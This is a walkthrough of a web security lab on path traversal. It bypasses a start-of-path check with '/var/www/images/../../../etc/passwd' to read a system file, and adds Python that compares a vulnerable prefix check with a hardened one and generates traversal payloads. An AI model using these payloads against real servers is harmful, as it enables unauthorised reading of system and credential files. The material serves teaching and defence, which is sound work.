File path traversal, validation of start of path

1

Let's access the image through the browser.

2

We can now intercept this request in Burp Suite using the Proxy.

3

Now we can send the intercepted request to Repeater, where we can modify it and resend it as often as we like.

Let's first change the filename parameter to a direct absolute path and send the request:

/etc/passwd

4

The server requires the user-supplied filename to start with /var/www/images, but it only checks that prefix; it does not canonicalise the path before deciding whether to serve the file. A value that begins with the expected directory and then climbs back out with ../ sequences therefore passes the check. Because /var/www/images is three directories deep, three ../ segments bring us to the filesystem root. Let's change the filename parameter to the following and send the request:

/var/www/images/../../../etc/passwd
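The bypass above works because a prefix check and a canonicalised path check are not the same thing. The following added example (not part of the lab or of PortSwigger's code) puts a check modelled on the lab's behaviour next to a hardened one, and generalises the payload construction to any base directory and target file. The image directory and the /image?filename= endpoint are assumptions taken from the walkthrough; everything runs offline with no network access.

```python
"""Start-of-path validation: vulnerable prefix check vs canonicalised check.

Added example; the base directory and endpoint are assumptions from the lab.
"""
import posixpath
from urllib.parse import urlencode

BASE_DIR = "/var/www/images"   # assumed image directory enforced by the lab server


def vulnerable_check(filename: str) -> bool:
    """Mirror the lab server's validation: only the literal prefix is tested.

    Anything that *starts with* the directory is accepted, including
    '/var/www/images/../../../etc/passwd' and '/var/www/images2/secret'.
    """
    return filename.startswith(BASE_DIR)


def hardened_check(filename: str) -> bool:
    """Canonicalise first, then require the result to sit inside BASE_DIR.

    posixpath.normpath collapses '.' and '..' lexically, so the test is
    deterministic and needs no filesystem. On a real server, also resolve
    symlinks (os.path.realpath) before the containment test.
    """
    canonical = posixpath.normpath(filename)
    # The trailing separator stops '/var/www/images2' from matching.
    return canonical == BASE_DIR or canonical.startswith(BASE_DIR + "/")


def build_payload(base_dir: str, target: str) -> str:
    """Build a start-of-path bypass for an arbitrary base directory.

    One '../' is needed per directory component of base_dir to climb back
    to '/', after which the absolute target path is appended.
    """
    depth = len([p for p in base_dir.split("/") if p])
    climb = "/".join([".."] * depth)
    return f"{base_dir}/{climb}{target}"


def build_request_path(payload: str, endpoint: str = "/image") -> str:
    """URL-encode the payload into the query string we paste into Repeater.

    The '/image' endpoint name is an assumption from the walkthrough.
    """
    return f"{endpoint}?{urlencode({'filename': payload})}"


if __name__ == "__main__":
    payload = build_payload(BASE_DIR, "/etc/passwd")
    print("payload:         ", payload)
    print("request path:    ", build_request_path(payload))
    print("vulnerable check:", vulnerable_check(payload))   # accepted
    print("hardened check:  ", hardened_check(payload))     # rejected
```

The hardened check rejects both the traversal payload and the "sibling directory" trick (/var/www/images2/...), which the naive prefix test also lets through; the usual fix pattern is exactly this: canonicalise, then compare against the base directory plus a trailing separator.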

5

The response contains the contents of /etc/passwd, and the lab is marked as solved.

6